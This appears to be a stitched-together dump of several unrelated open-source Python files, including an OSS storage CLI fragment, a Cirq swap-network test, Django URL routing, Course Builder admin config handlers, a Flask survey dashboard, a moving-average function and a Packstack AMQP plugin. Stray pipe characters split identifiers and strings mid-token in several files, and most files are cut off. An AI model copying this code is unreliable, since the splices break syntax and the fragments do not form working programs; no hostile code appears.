Cancel oss://bucket/object --upload_id xxx
MultiUpload localfile oss://bucket/object --upload_id xxx --thread_num 10 --max_part_num 1000 --check_md5 false
UploadPartFromFile localfile oss://bucket/object --upload_id xxx --part_number xxx
UploadPartFromString oss://bucket/object --upload_id xxx --part_number xxx --data xxx
Config --host oss.aliyuncs.com --accessid accessid --accesskey accesskey --sts_token token
'''
def print_result(cmd, res):
'''
Print HTTP Response if failedd.
'''
try:
if res.status / 100 == 2:
pass
else:
body = res.read()
print "Error Headers:\n"
print res.getheaders()
print "Error Body:\n"
print body[0:1024]
print "Error Status:\n"
print res.status
print cmd, "Failed!"
if res.status == 403:
check_endpoint_error(body)
exit(-1)
except AttributeError:
pass
def format_size(size):
size = float(size)
coeffs = ['K', 'M', 'G', 'T']
coeff = ""
while size > 2048:
size /= 1024
coeff = coeffs.pop(0)
return str("%.2f"%size) + coeff + "B"
def format_utf8(string):
string = smart_code(string)
if isinstance(string, unicode):
string = string.encode('utf-8')
return string
def split_path(path):
if not path.lower().startswith(OSS_PREFIX):
print "%s parameter %s invalid, " \
"must be start with %s" % \
(args[0], args[1], OSS_PREFIX)
sys.exit(1)
pather = path[len(OSS_PREFIX):].split('/')
return pather
def check_upload_id(upload_id):
upload_id_len = 32
if len(upload_id) != upload_id_len:
print "upload_id is a 32-bit string generated by OSS"
print "you can get valid upload_id by init or listparts command"
sys.exit(1)
def check_bucket(bucket):
if len(bucket) == 0:
print "Bucket should not be empty!"
print "Please input oss://bucket"
sys.exit(1)
def check_object(object):
if len(object) == 0:
print "Object should not be empty!"
print "Please input oss://bucket/object"
sys.exit(1)
if object.startswith("/"):
print "object name should not begin with / "
|
quantumlib/Cirq | cirq-core/cirq/contrib/acquaintance/shift_swap_network_test.py | Python | apache-2.0 | 11,590 | 0.00099 | # Copyright 2018 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import random
import pytest
import cirq
import cirq.contrib.acquaintance as cca
def random_part_lens(max_n_parts, max_part_size):
return tuple(random.randint(1, max_part_size) for _ in range(random.randint(1, max_n_parts)))
@pytest.mark.parametrize(
'left_part_lens,right_part_lens',
[tuple(random_part_lens(7, 2) for _ in ('left', 'right')) for _ in range(5)],
)
def test_shift_swap_network_gate_acquaintance_opps(left_part_lens, right_part_lens):
gate = cca.ShiftSwapNetworkGate(left_part_lens, right_part_lens)
n_qubits = gate.qubit_count()
qubits = cirq.LineQubit.range(n_qubits)
strategy = cirq.Circuit(gate(*qubits))
# actual_opps
initial_mapping = {q: i for i, q in enumerate(qubits)}
actual_opps = cca.get_logical_acquaintance_opportunities(strategy, initial_mapping)
# expected opps
i = 0
sides = ('left', 'right')
parts = {side: [] for side in sides}
for side, part_lens in zip(sides, (left_part_lens, right_part_lens)):
for part_len in part_lens:
parts[side].append(set(range(i, i + part_len)))
i += part_len
expected_opps = set(
frozenset(left_part | right_part)
for left_part, right_part in itertools.product(parts['left'], parts['right'])
)
assert actual_opps == expected_opps
circuit_diagrams = {
(
'undecomposed',
(1,) * 3,
(1,) * 3,
): """
0: ───(0, 0, 0)↦(1, 0, 0)───
│
1: ───(0, 1, 0)↦(1, 1, 0)───
│
2: ───(0, 2, 0)↦(1, 2, 0)───
│
3: ───(1, 0, 0)↦(0, 0, 0)───
│
4: ───(1, 1, 0)↦(0, 1, 0)───
│
5: ───(1, 2, 0)↦(0, 2, 0)───
""",
(
'decomposed',
(1,) * 3,
(1,) * 3,
): """
0: ───────────────────────█───╲0╱───────────────────────
│ │
1: ─────────────█───╲0╱───█───╱1╲───█───╲0╱─────────────
│ │ │ │
2: ───█───╲0╱───█───╱1╲───█───╲0╱───█───╱1╲───█───╲0╱───
│ │ │ │ │ │
3: ───█───╱1╲───█───╲0╱───█───╱1╲───█───╲0╱───█───╱1╲───
│ │ │ │
4: ─────────────█───╱1╲───█───╲0╱───█───╱1╲─────────────
│ │
5: ───────────────────────█───╱1╲───────────────────────
""",
(
'undecomposed',
(2,) * 3,
(2,) * 3,
): """
0: ────(0, 0, 0)↦(1, 0, 0)───
│
1: ────(0, 0, 1)↦(1, 0, 1)───
│
2: ────(0, 1, 0)↦(1, 1, 0)───
│
3: ────(0, 1, 1)↦(1, 1, 1)───
│
4: ────(0, 2, 0)↦(1, 2, 0)───
│
5: ────(0, 2, 1)↦(1, 2, 1)───
│
6: ────(1, 0, 0)↦(0, 0, 0)───
│
7: ────(1, 0, 1)↦(0, 0, 1)───
│
8: ────(1, 1, 0)↦(0, 1, 0)───
│
9: ────(1, 1, 1)↦(0, 1, 1)───
│
10: ───(1, 2, 0)↦(0, 2, 0)───
│
11: ───(1, 2, 1)↦(0, 2, 1)───
""",
(
'decomposed',
(2,) * 3,
(2,) * 3,
): """
0: ────────────────────────█───╲0╱───────────────────────
│ │
1: ────────────────────────█───╲1╱───────────────────────
│ │
2: ──────────────█───╲0╱───█───╱2╲───█───╲0╱─────────────
│ │ │ │ │ │
3: ──────────────█───╲1╱───█───╱3╲───█───╲1╱─────────────
│ │ │ │
4: ────█───╲0╱───█───╱2╲───█───╲0╱───█───╱2╲───█───╲0╱───
│ │ │ │ │ │ │ │ │ │
5: ────█───╲1╱───█───╱3╲───█───╲1╱───█───╱3╲───█───╲1╱───
│ │ │ │ │ │
6: ────█───╱2╲───█───╲0╱───█───╱2╲───█───╲0╱───█───╱2╲───
│ │ │ │ │ │ │ │ │ │
7: ────█───╱3╲───█───╲1╱───█───╱3╲───█───╲1╱───█───╱3╲───
│ │ │ │
8: ──────────────█───╱2╲───█───╲0╱───█───╱2╲─────────────
│ │ │ │ │ │
9: ──────────────█───╱3╲───█───╲1╱───█───╱3╲─────────────
│ │
10: ───────────────────────█───╱2╲───────────────────────
│ │
11: ───────────────────────█───╱3╲───────────────────────
""",
(
'undecomposed',
(1, 2, 2),
(2, 1, 2),
): """
0: ───(0, 0, 0)↦(1, 0, 0)───
│
1: ───(0, 1, 0)↦(1, 1, 0)───
│
2: ───(0, 1, 1)↦(1, 1, 1)───
│
3: ───(0, 2, 0)↦(1, 2, 0)───
│
4: ───(0, 2, 1)↦(1, 2, 1)───
│
5: ───(1, 0, 0)↦(0, 0, 0)───
│
6: ───(1, 0, 1)↦(0, 0, 1)───
│
7: ───(1, 1, 0)↦(0, 1, 0)───
│
8: ───(1, 2, 0)↦(0, 2, 0)───
│
9: ───(1, 2, 1)↦(0, 2, 1)───
""",
(
'decomposed',
(1, 2, 2),
(2, 1, 2),
): """
0: ───────────────────────█───╲0╱───────────────────────
│ │
1: ─────────────█───╲0╱───█───╱1╲───────────────────────
│ │ │ │
2: ─────────────█───╲1╱───█───╱2╲───█───╲0╱─────────────
│ │ │ │
3: ───█───╲0╱───█───╱2╲───█───╲0╱───█───╱1╲───█───╲0╱───
│ │ │ │ │ │ │ │
4: ───█───╲1╱───█───╱3╲───█───╲1╱───█───╲0╱───█───╱1╲───
│ │ │ │ │ │ │ │
5: ───█───╱2╲───█───╲0╱───█───╱2╲───█───╲1╱───█───╱2╲───
│ │ │ │ │ │
6: ───█───╱3╲───█───╲1╱───█───╲0╱───█───╱2╲─────────────
│ │ │ │ │ │
7: ─────────────█───╱2╲───█───╲1╱───█───╱3╲─────────────
│ │
8: ───────────────────────█───╱2╲───────────────────────
│ │
9: ───────────────────────█───╱3╲───────────────────────
""",
}
@pytest.mark.parametrize('left_part_lens,right_part_lens', set(key[1:] for key in circuit_diagrams))
def test_shift_swap_network_gate_diagrams(left_part_lens, right_part_lens):
gate = cca.ShiftSwapNetworkGate(left_part_lens, right_part_lens)
n_qubits = gate.qubit_count()
qubits = cirq.LineQubit.range(n_qubits)
circuit = cirq.Circuit(gate(*qubits))
diagram = circuit_diagrams['undecomposed', left_part_lens, right_part_lens]
cirq.testing.assert_has_diagram(circuit, diagram)
cca.expose_acquaintance_gates(circuit)
diagram = circuit_diagrams['decomposed', left_part_lens, right_part_lens]
cirq.testing.assert_has_diagram(circuit, diagram)
def test_shift_swap_network_gate_bad_part_lens():
with pytest.raises(ValueError):
cca.ShiftSwapNetworkGate((0, 1, 1), (2, 2))
with pytest.raises(ValueError):
cca.ShiftSwapNetworkGate((-1, 1, 1), (2, 2))
with pytest.raises(ValueError):
cca.ShiftSwapNetworkGate((1, 1), (2, 0, | 2))
with pytest.raises(ValueError):
cca.ShiftSwapNetworkGate((1, 1), (2, -3))
@pytest.mark.parametrize(
'left_part_lens,right_part_lens',
[tuple(random_part_lens(2, 2) for _ in ('left', 'right')) for _ in range(5)],
)
def test_shift_swap_network_gate_repr(left_part_lens, right_part_lens):
gate = cca.ShiftSwapNetworkGate(left_part_lens, right_part_lens)
cirq.testing.assert_equivalent_repr(gate)
gate = cca.ShiftSwapNetworkGate(lef | t_part_lens, right_part_lens, cirq.ZZ)
cirq.testing.assert_equivalent_repr(gate)
@pytest.mark.parametrize(
'left_part_lens,right_part_lens',
[tuple(random_part_lens(2, 2) for _ in ('left', 'right')) for _ in range(5)],
)
def test_shift_swap_network_gate_permutation(left_part_lens, right_part_lens):
gate = cca.ShiftSwapNetworkGate(left_part_lens, right_part_lens)
n_qubits = gate.qubit_count()
cca.testing.assert_permutation_decomposition_equivalence(gate, n_qubits)
|
chrisguitarguy/GuitarSocieties.org | website/urls.py | Python | bsd-3-clause | 624 | 0.001603 | # -*- coding: utf-8 -*-
"""
Gu | itarSocieties.org
~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2014 Christopher Davis <http://christopherdavis.me>
:license: http://opensource.org/licenses/bsd-3-clause
"""
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.utils.translation import ugettext_lazy as _
admin.site.site_header = _('Guitar Societies')
admin.site.site_title = _('Guitar Societies')
admin.site.index_title = _('Guitar Society Admin')
urlpatterns = patterns('',
url(r'^ | admin/', include(admin.site.urls)),
url(r'^', include('societies.urls', namespace='societies')),
)
|
haoyuchen1992/CourseBuilder | modules/admin/config.py | Python | apache-2.0 | 13,933 | 0 | # Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Classes supporting configuration property editor and REST operations."""
__author__ = 'Pavel Simakov (psimakov@google.com)'
import cgi
import urllib
from controllers import sites
from controllers.utils import BaseRESTHandler
from controllers.utils import XsrfTokenManager
from models import config
from models import courses
from models import models
from models import roles
from models import transforms
from modules.oeditor import oeditor
from google.appengine.api import users
from google.appengine.ext import db
# This is a template because the value type is not yet known.
SCHEMA_JSON_TEMPLATE = """
{
"id": "Configuration Property",
"type": "object",
"description": "Configuration Property Override",
"properties": {
"name" : {"type": "string"},
"value": {"optional": true, "type": "%s"},
"is_draft": {"type": "boolean"}
}
}
"""
# This is a template because the doc_string is not yet known.
SCHEMA_ANNOTATIONS_TEMPLATE = [
(['title'], 'Configuration Property Override'),
(['properties', 'name', '_inputex'], {
'label': 'Name', '_type': 'uneditable'}),
oeditor.create_bool_select_annotation(
['properties', 'is_draft'], 'Status', 'Pending', 'Active',
description='<strong>Active</strong>: This value is active and '
'overrides all other defaults.<br/><strong>Pending</strong>: This '
'value is not active yet, and the default settings still apply.')]
class ConfigPropertyRights(object):
"""Manages view/edit rights for configuration properties."""
@classmethod
def can_view(cls):
return cls.can_edit()
@classmethod
def can_edit(cls):
return roles.Roles.is_super_admin()
@classmethod
def can_delete(cls):
return cls.can_edit()
@classmethod
def can_add(cls):
return cls.can_edit()
class ConfigPropertyEditor(object):
"""An editor for any configuration property."""
# Map of configuration property type into inputex type.
type_map = {str: 'string', int: 'integer', bool: 'boolean'}
@classmethod
def get_schema_annotations(cls, config_property):
"""Gets editor specific schema annotations."""
doc_string = '%s Default: \'%s\'.' % (
config_property.doc_string, config_property.default_value)
item_dict = [] + SCHEMA_ANNOTATIONS_TEMPLATE
item_dict.append((
['properties', 'value', '_inputex'], {
'label': 'Value', '_type': '%s' % cls.get_value_type(
config_property),
'description': doc_string}))
return item_dict
@classmethod
def get_value_type(cls, config_property):
"""Gets an editor specific type for the property."""
value_type = cls.type_map[config_property.value_type]
if not value_type:
raise Exception('Unknown type: %s', config_property.value_type)
if config_property.value_type == str and config_property.multiline:
return 'text'
return value_type
@classmethod
def get_schema_json(cls, config_property):
"""Gets JSON schema for | configuration property."""
return SCHEMA_JSON_TEMPLATE % cls.get_value_type(config_property)
def get_add_course(self):
"""Handles 'add_course' action and renders new course entry editor."""
exit_url = '/admin?action=courses'
rest_url = CoursesItemRESTHandler.URI
template_values = {}
template_values[
'page_title'] = 'Course Builder - Add Cour | se'
template_values['main_content'] = oeditor.ObjectEditor.get_html_for(
self, CoursesItemRESTHandler.SCHEMA_JSON,
CoursesItemRESTHandler.SCHEMA_ANNOTATIONS_DICT,
None, rest_url, exit_url,
auto_return=True,
save_button_caption='Add New Course')
self.render_page(template_values)
def get_config_edit(self):
"""Handles 'edit' property action."""
key = self.request.get('name')
if not key:
self.redirect('/admin?action=settings')
item = config.Registry.registered[key]
if not item:
self.redirect('/admin?action=settings')
template_values = {}
template_values[
'page_title'] = 'Course Builder - Edit Settings'
exit_url = '/admin?action=settings#%s' % cgi.escape(key)
rest_url = '/rest/config/item'
delete_url = '/admin?%s' % urllib.urlencode({
'action': 'config_reset',
'name': key,
'xsrf_token': cgi.escape(self.create_xsrf_token('config_reset'))})
template_values['main_content'] = oeditor.ObjectEditor.get_html_for(
self, ConfigPropertyEditor.get_schema_json(item),
ConfigPropertyEditor.get_schema_annotations(item),
key, rest_url, exit_url, delete_url=delete_url)
self.render_page(template_values)
def post_config_override(self):
"""Handles 'override' property action."""
name = self.request.get('name')
# Find item in registry.
item = None
if name and name in config.Registry.registered.keys():
item = config.Registry.registered[name]
if not item:
self.redirect('/admin?action=settings')
# Add new entity if does not exist.
try:
entity = config.ConfigPropertyEntity.get_by_key_name(name)
except db.BadKeyError:
entity = None
if not entity:
entity = config.ConfigPropertyEntity(key_name=name)
entity.value = str(item.value)
entity.is_draft = True
entity.put()
models.EventEntity.record(
'override-property', users.get_current_user(), transforms.dumps({
'name': name, 'value': str(entity.value)}))
self.redirect('/admin?%s' % urllib.urlencode(
{'action': 'config_edit', 'name': name}))
def post_config_reset(self):
"""Handles 'reset' property action."""
name = self.request.get('name')
# Find item in registry.
item = None
if name and name in config.Registry.registered.keys():
item = config.Registry.registered[name]
if not item:
self.redirect('/admin?action=settings')
# Delete if exists.
try:
entity = config.ConfigPropertyEntity.get_by_key_name(name)
if entity:
old_value = entity.value
entity.delete()
models.EventEntity.record(
'delete-property', users.get_current_user(),
transforms.dumps({
'name': name, 'value': str(old_value)}))
except db.BadKeyError:
pass
self.redirect('/admin?action=settings')
class CoursesItemRESTHandler(BaseRESTHandler):
"""Provides REST API for course entries."""
URI = '/rest/courses/item'
SCHEMA_JSON = """
{
"id": "Course Entry",
"type": "object",
"description": "Course Entry",
"properties": {
"name": {"type": "string"},
"title": {"type": "string"},
"admin_email": {"type": "string"}
}
}
"""
SCHEMA_DICT = transforms.loads(SCHEMA_JSON)
SCHEMA_ANNOTATIONS_DICT = [
(['title'], 'New Course Entry'),
(['properties', 'name', '_inputex'], {'label': 'Unique Name'}),
|
codeforamerica/mdc-feedback | feedback/dashboard/views.py | Python | mit | 18,098 | 0.00116 | # -*- coding: utf-8 -*-
import arrow
import datetime
import ujson
import timeit
from flask.ext.login import login_required
from flask import (
Blueprint, render_template
)
from feedback.dashboard.vendorsurveys import (
get_rating_scale, get_surveys_by_role,
get_surveys_by_completion, get_surveys_by_purpose,
get_all_survey_responses, get_rating_by_lang,
get_rating_by_purpose, get_rating_by_role
)
from feedback.surveys.constants import SURVEY_DAYS
from feedback.surveys.models import Survey
from feedback.dashboard.permits import (
api_health, get_lifespan,
get_permit_types, trade,
get_master_permit_counts,
dump_socrata_api
)
blueprint = Blueprint(
"dashboard", __name__,
template_folder='../templates',
static_folder="../static"
)
def to_bucket(str_date):
''' Converts the DB string time to a MM-DD string format.
'''
result = arrow.get(str_date)
return result.strftime("%m-%d")
@blueprint.route("/", methods=["GET", "POST"])
def home():
json_obj = {}
json_obj_home = {}
surveys_by_date = {}
surveys_date_array = []
surveys_value_array = []
for i in range(SURVEY_DAYS, -1, -1):
time_i = (datetime.date.today() - datetime.timedelta(i))
date_index = time_i.strftime("%m-%d")
surveys_by_date[date_index] = 0
surveys_date_array.append(date_index)
survey_table = get_all_survey_responses(SURVEY_DAYS)
sms_rows = [x.lang for x in survey_table if x.method == 'sms']
web_rows = [x.lang for x in survey_table if x.method == 'web']
# ANALYTICS CODE
for i in range(SURVEY_DAYS, -1, -1):
time_i = (datetime.date.today() - datetime.timedelta(i))
date_index = time_i.strftime("%m-%d")
surveys_value_array.append(
len([x for x in survey_table if to_bucket(x.date_submitted) == date_index]))
dashboard_collection_home = [
{
"id": "graph",
"title": "Surveys Submitted".format(SURVEY_DAYS),
"data": {
"graph": {
"datetime": {
"data": surveys_date_array
},
"series": [
{
"data": surveys_value_array
}
]
}
}
},
{
"title": "Satisfaction Rating".format(SURVEY_DAYS),
"data": "{0:.2f}".format(get_rating_scale(survey_table))
},
{
"title": "Survey Type".format(SURVEY_DAYS),
"data": {
"web_en": web_rows.count('en'),
"web_es": web_rows.count('es'),
"sms_en": sms_rows.count('en'),
"sms_es": sms_rows.count('es')
},
"labels": {
"web_en": "Web (English)",
"web_es": "Web (Spanish)",
"sms_en": "Text (English)",
| "sms_es": "Text (Spanish)"
}
},
{},
{},
{},
{ | },
{},
{},
{},
{
"title": "Surveys by Survey Role",
"data": get_surveys_by_role(survey_table)
},
{},
{
"title": "How many completions?",
"data": get_surveys_by_completion(survey_table)
},
{
"title": "Respondents by Purpose",
"data": get_surveys_by_purpose(survey_table)
},
{
"title": "Ratings",
"data": {
"en": get_rating_by_lang(survey_table, 'en'),
"es": get_rating_by_lang(survey_table, 'es'),
"p1": get_rating_by_purpose(survey_table, 1),
"p2": get_rating_by_purpose(survey_table, 2),
"p3": get_rating_by_purpose(survey_table, 3),
"p4": get_rating_by_purpose(survey_table, 4),
"p5": get_rating_by_purpose(survey_table, 5),
"contractor": get_rating_by_role(survey_table, 1),
"architect": get_rating_by_role(survey_table, 2),
"permitconsultant": get_rating_by_role(survey_table, 3),
"homeowner": get_rating_by_role(survey_table, 4),
"bizowner": get_rating_by_role(survey_table, 5)
}
}
]
json_obj_home['daily_graph'] = ujson.dumps(dashboard_collection_home[0]['data']['graph'])
json_obj_home['surveys_type'] = ujson.dumps(dashboard_collection_home[2])
json_obj_home['survey_role'] = ujson.dumps(dashboard_collection_home[10])
json_obj_home['survey_complete'] = ujson.dumps(dashboard_collection_home[12])
json_obj_home['survey_purpose'] = ujson.dumps(dashboard_collection_home[13])
today = datetime.date.today()
return render_template(
"public/home.html",
api=1,
date=today.strftime('%B %d, %Y'),
json_obj=json_obj_home,
dash_obj=dashboard_collection_home,
resp_obj=survey_table,
title='Dashboard - Main'
)
@blueprint.route("/metrics", methods=["GET", "POST"])
def metrics():
json_obj = {}
surveys_by_date = {}
surveys_date_array = []
surveys_value_array = []
for i in range(SURVEY_DAYS, -1, -1):
time_i = (datetime.date.today() - datetime.timedelta(i))
date_index = time_i.strftime("%m-%d")
surveys_by_date[date_index] = 0
surveys_date_array.append(date_index)
survey_table = get_all_survey_responses(SURVEY_DAYS)
sms_rows = [x.lang for x in survey_table if x.method == 'sms']
web_rows = [x.lang for x in survey_table if x.method == 'web']
# ANALYTICS CODE
for i in range(SURVEY_DAYS, -1, -1):
time_i = (datetime.date.today() - datetime.timedelta(i))
date_index = time_i.strftime("%m-%d")
surveys_value_array.append(
len([x for x in survey_table if to_bucket(x.date_submitted) == date_index]))
dashboard_collection = [
{
"id": "graph",
"title": "Surveys Submitted".format(SURVEY_DAYS),
"data": {
"graph": {
"datetime": {
"data": surveys_date_array
},
"series": [
{
"data": surveys_value_array
}
]
}
}
},
{
"title": "Satisfaction Rating".format(SURVEY_DAYS),
"data": "{0:.2f}".format(get_rating_scale(survey_table))
},
{
"title": "Survey Type".format(SURVEY_DAYS),
"data": {
"web_en": web_rows.count('en'),
"web_es": web_rows.count('es'),
"sms_en": sms_rows.count('en'),
"sms_es": sms_rows.count('es')
},
"labels": {
"web_en": "Web (English)",
"web_es": "Web (Spanish)",
"sms_en": "Text (English)",
"sms_es": "Text (Spanish)"
}
},
{
"title": "Commercial",
"data": {
"nc": get_lifespan('nc'),
"rc": get_lifespan('rc'),
"s": get_lifespan('s')
}
},
{
"title": "Residential",
"data": {
"nr": get_lifespan('nr'),
"rr": get_lifespan('rr'),
"p": get_lifespan('p'),
"f": get_lifespan('f'),
"e": get_lifespan('e')
}
},
{
"title": "Average time from application date to permit issuance, Owner/Builder Permits, Last 30 Days",
"data": 0
},
{
"title": "Same Day Trade Permits",
"data": {
"PLUM": trade(30, 'PLUM'),
"BLDG": trade(30, 'BLDG'),
"ELEC": trade(30, 'ELEC'),
"FIRE": trade(30, 'FIRE'),
"ZIPS": trade(30, 'ZIPS')
}
},
{
"title": "(U |
kylejusticemagnuson/pyti | pyti/linear_weighted_moving_average.py | Python | mit | 700 | 0.002857 | from __future__ import absolute_import
from pyti import catch_errors
from pyti.function_helper import fill_for_noncomputable_vals
from six.moves import range
def linear_weighted_moving_ | average(data, period):
"""
Linear Weighted Moving Average.
Formula:
LWMA = SUM(DATA[i]) * i / SUM(i)
"""
catch_errors.check_for_period_error(data, period)
idx_period = list(range(1, period+1))
lwma = [(sum([i * idx_period[data[idx-(period-1):idx+1].index(i)]
for i in data[idx-(period-1):idx+1]])) /
sum(range(1, len(data[idx+1-period:idx+1])+1)) for idx in range(period-1, len(data))]
lwma = fill_for_noncomputable_vals(data, | lwma)
return lwma
|
fr34k8/packstack | packstack/plugins/amqp_002.py | Python | apache-2.0 | 9,717 | 0.000206 | # -*- coding: utf-8 -*-
"""
Installs and configures amqp
"""
import logging
impor | t uuid
import os
from packstack.installer import validators
from packstack.installer import processors
from packstack.installer import basedefs
from packstack.installer import utils
from packstack.modules.common import filtered_hosts
from packstack.modules.ospluginutils import (getManifestTemplate,
app | endManifestFile)
#------------------ oVirt installer initialization ------------------
PLUGIN_NAME = "AMQP"
PLUGIN_NAME_COLORED = utils.color_text(PLUGIN_NAME, 'blue')
def initConfig(controller):
params = [
{"CMD_OPTION": "amqp-backend",
"USAGE": ("Set the AMQP service backend. Allowed values are: "
"qpid, rabbitmq"),
"PROMPT": "Set the AMQP service backend",
"OPTION_LIST": ["qpid", "rabbitmq"],
"VALIDATORS": [validators.validate_options],
"DEFAULT_VALUE": "rabbitmq",
"MASK_INPUT": False,
"LOOSE_VALIDATION": False,
"CONF_NAME": "CONFIG_AMQP_BACKEND",
"USE_DEFAULT": False,
"NEED_CONFIRM": False,
"CONDITION": False,
"DEPRECATES": ['CONFIG_AMQP_SERVER']},
{"CMD_OPTION": "amqp-host",
"USAGE": ("The IP address of the server on which to install the "
"AMQP service"),
"PROMPT": "Enter the IP address of the AMQP service",
"OPTION_LIST": [],
"VALIDATORS": [validators.validate_ssh],
"DEFAULT_VALUE": utils.get_localhost_ip(),
"MASK_INPUT": False,
"LOOSE_VALIDATION": True,
"CONF_NAME": "CONFIG_AMQP_HOST",
"USE_DEFAULT": False,
"NEED_CONFIRM": False,
"CONDITION": False},
{"CMD_OPTION": "amqp-enable-ssl",
"USAGE": "Enable SSL for the AMQP service",
"PROMPT": "Enable SSL for the AMQP service?",
"OPTION_LIST": ["y", "n"],
"VALIDATORS": [validators.validate_options],
"DEFAULT_VALUE": "n",
"MASK_INPUT": False,
"LOOSE_VALIDATION": False,
"CONF_NAME": "CONFIG_AMQP_ENABLE_SSL",
"USE_DEFAULT": False,
"NEED_CONFIRM": False,
"CONDITION": False},
{"CMD_OPTION": "amqp-enable-auth",
"USAGE": "Enable Authentication for the AMQP service",
"PROMPT": "Enable Authentication for the AMQP service?",
"OPTION_LIST": ["y", "n"],
"VALIDATORS": [validators.validate_options],
"DEFAULT_VALUE": "n",
"MASK_INPUT": False,
"LOOSE_VALIDATION": False,
"CONF_NAME": "CONFIG_AMQP_ENABLE_AUTH",
"USE_DEFAULT": False,
"NEED_CONFIRM": False,
"CONDITION": False},
]
group = {"GROUP_NAME": "AMQP",
"DESCRIPTION": "AMQP Config parameters",
"PRE_CONDITION": False,
"PRE_CONDITION_MATCH": True,
"POST_CONDITION": False,
"POST_CONDITION_MATCH": True}
controller.addGroup(group, params)
params = [
{"CMD_OPTION": "amqp-nss-certdb-pw",
"USAGE": ("The password for the NSS certificate database of the AMQP "
"service"),
"PROMPT": "Enter the password for NSS certificate database",
"OPTION_LIST": [],
"VALIDATORS": [validators.validate_not_empty],
"DEFAULT_VALUE": "PW_PLACEHOLDER",
"PROCESSORS": [processors.process_password],
"MASK_INPUT": True,
"LOOSE_VALIDATION": True,
"CONF_NAME": "CONFIG_AMQP_NSS_CERTDB_PW",
"USE_DEFAULT": False,
"NEED_CONFIRM": True,
"CONDITION": False},
{"CMD_OPTION": "amqp-ssl-port",
"USAGE": ("The port in which the AMQP service listens to SSL "
"connections"),
"PROMPT": "Enter the SSL port for the AMQP service",
"OPTION_LIST": [],
"VALIDATORS": [validators.validate_not_empty],
"DEFAULT_VALUE": "5671",
"MASK_INPUT": False,
"LOOSE_VALIDATION": True,
"CONF_NAME": "CONFIG_AMQP_SSL_PORT",
"USE_DEFAULT": False,
"NEED_CONFIRM": False,
"CONDITION": False},
{"CMD_OPTION": "amqp-ssl-cert-file",
"USAGE": ("The filename of the certificate that the AMQP service "
"is going to use"),
"PROMPT": ("Enter the filename of the SSL certificate for the AMQP "
"service"),
"OPTION_LIST": [],
"VALIDATORS": [validators.validate_not_empty],
"DEFAULT_VALUE": "/etc/pki/tls/certs/amqp_selfcert.pem",
"MASK_INPUT": False,
"LOOSE_VALIDATION": True,
"CONF_NAME": "CONFIG_AMQP_SSL_CERT_FILE",
"USE_DEFAULT": False,
"NEED_CONFIRM": False,
"CONDITION": False},
{"CMD_OPTION": "amqp-ssl-key-file",
"USAGE": ("The filename of the private key that the AMQP service "
"is going to use"),
"PROMPT": "Enter the private key filename",
"OPTION_LIST": [],
"VALIDATORS": [validators.validate_not_empty],
"DEFAULT_VALUE": "/etc/pki/tls/private/amqp_selfkey.pem",
"MASK_INPUT": False,
"LOOSE_VALIDATION": True,
"CONF_NAME": "CONFIG_AMQP_SSL_KEY_FILE",
"USE_DEFAULT": False,
"NEED_CONFIRM": False,
"CONDITION": False},
{"CMD_OPTION": "amqp-ssl-self-signed",
"USAGE": "Auto Generates self signed SSL certificate and key",
"PROMPT": "Generate Self Signed SSL Certificate",
"OPTION_LIST": ["y", "n"],
"VALIDATORS": [validators.validate_not_empty],
"DEFAULT_VALUE": "y",
"MASK_INPUT": False,
"LOOSE_VALIDATION": True,
"CONF_NAME": "CONFIG_AMQP_SSL_SELF_SIGNED",
"USE_DEFAULT": False,
"NEED_CONFIRM": False,
"CONDITION": False},
]
group = {"GROUP_NAME": "AMQPSSL",
"DESCRIPTION": "AMQP Config SSL parameters",
"PRE_CONDITION": "CONFIG_AMQP_ENABLE_SSL",
"PRE_CONDITION_MATCH": "y",
"POST_CONDITION": False,
"POST_CONDITION_MATCH": True}
controller.addGroup(group, params)
params = [
{"CMD_OPTION": "amqp-auth-user",
"USAGE": "User for amqp authentication",
"PROMPT": "Enter the user for amqp authentication",
"OPTION_LIST": [],
"VALIDATORS": [validators.validate_not_empty],
"DEFAULT_VALUE": "amqp_user",
"MASK_INPUT": False,
"LOOSE_VALIDATION": True,
"CONF_NAME": "CONFIG_AMQP_AUTH_USER",
"USE_DEFAULT": False,
"NEED_CONFIRM": False,
"CONDITION": False},
{"CMD_OPTION": "amqp-auth-password",
"USAGE": "Password for user authentication",
"PROMPT": "Enter the password for user authentication",
"OPTION_LIST": ["y", "n"],
"VALIDATORS": [validators.validate_not_empty],
"PROCESSORS": [processors.process_password],
"DEFAULT_VALUE": "PW_PLACEHOLDER",
"MASK_INPUT": True,
"LOOSE_VALIDATION": True,
"CONF_NAME": "CONFIG_AMQP_AUTH_PASSWORD",
"USE_DEFAULT": False,
"NEED_CONFIRM": True,
"CONDITION": False},
]
group = {"GROUP_NAME": "AMQPAUTH",
"DESCRIPTION": "AMQP Config Athentication parameters",
"PRE_CONDITION": "CONFIG_AMQP_ENABLE_AUTH",
"PRE_CONDITION_MATCH": "y",
"POST_CONDITION": False,
"POST_CONDITION_MATCH": True}
controller.addGroup(group, params)
def initSequences(controller):
amqpsteps = [
{'title': 'Adding AMQP manifest entries',
'functions': [create_manifest]}
]
controller.addSequence("Installing AMQP", [], [], amqpsteps)
#-------------------------- step functions --------------------------
def create_manifest(config, messages):
server = utils.ScriptRunner(config['CONFIG_AMQP_HOST'])
if config['CONFIG_AMQP_ENABLE_SSL'] == 'y':
config['CONFIG_AMQP_ENABLE_SSL'] = 'true'
config['CONFIG_AMQP_PROTOCOL'] = 'ssl'
c |
hbldh/wlmetrics | wlmetrics/data/processing.py | Python | mit | 1,548 | 0.003876 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
:mod:`processing`
==================
.. module:: processing
:platform: Unix, Windows
:synopsis:
